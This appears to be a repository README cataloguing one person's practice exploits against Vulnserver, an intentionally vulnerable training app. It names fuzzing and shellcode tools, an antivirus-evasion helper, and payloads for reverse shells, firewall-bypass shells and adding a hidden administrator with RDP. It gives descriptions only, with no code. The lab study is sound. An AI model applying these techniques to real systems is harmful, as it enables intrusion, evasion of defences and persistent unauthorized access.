Vulnserver is an intentionally vulnerable application to help learn about exploiting buffer overflows. I used this vulnerable app to help practice writing assembly code, fuzzing, and writing exploits for various types of buffer overflows.
This repository contains all of the custom developed tools and proof of concept exploits I've created while working through Vulnserver.
Tools I have developed to facilitate proof of concept development against Vulnserver.
- chunk_file - Split an executable in half to help narrow down the the section that is triggering Anitvirus
- compile_assembly - Modified script from PentesterAcademy's x86 Assembly Language and Shellcoding on Linux. Script will check for null characters and output shellcode.
- encoder - Alphanumeric Sub-Encoder developed from Metasploit's opt_sub.rb encoder and Corelan's Mona encoder.
- fuzzing - Python script to automate fuzzing multiple commands using Spike Fuzzer. Does require a modification to Spike source code.
- safe_address_checker - Python script that will validate a list of addresses against a set of good characters.
- str_to_hex - Python scripts that will generate x86 assembly instructions for a list of strings.
My initial focus was attacking Vulnserver installed on a Windows XP SP3 VM.
- fuzzing - Spike scripts used to fuzz Vulnserver's commands
- gmon - Standard Structured Exception Handler (SEH) buffer overwrite
- gter - Limited buffer size
- hter - Reads in literal value of buffer
- kset - Limited buffer size
- lter - Restricted character set; Only Alphanumeric characters allowed
- trun - Straigt foward buffer overwrite. This command was used to learn about Windows API programming using x86 assembly langauge.
This section uses Stephen Fewer's hashing algorithm to dynamically find addresses for the Windows API methods to use against each Vulnserver command.
- Custom Reverse Shell - Custom Reverse shell using CreateProcessA
- Port Rebind Shell - Firewall bypass, Use port rebind technique to launch custom bind shell.
- Address Reuse Shell - Firewall bypass, Use address reuse technique to bind to physical address and port used by Vulnserver to launch a custom bindshell.
- Custom Bind Shell - Custom bind shell using CreateProcessA
- Add User, Enable RDP - Use Windows API to create a new users, add them to local administrator's group, and enable RDP
- Add Use, Enable RDP via System() - Use System() to create a new users, add them to local administrator's group, and enable RDP
- Upgrade all the tools and exploits to Python3
- Practice against newer Windows Operating Systems
- Practice with mitigation controls enabled, such as DEP, ASLR, and strict firewall rules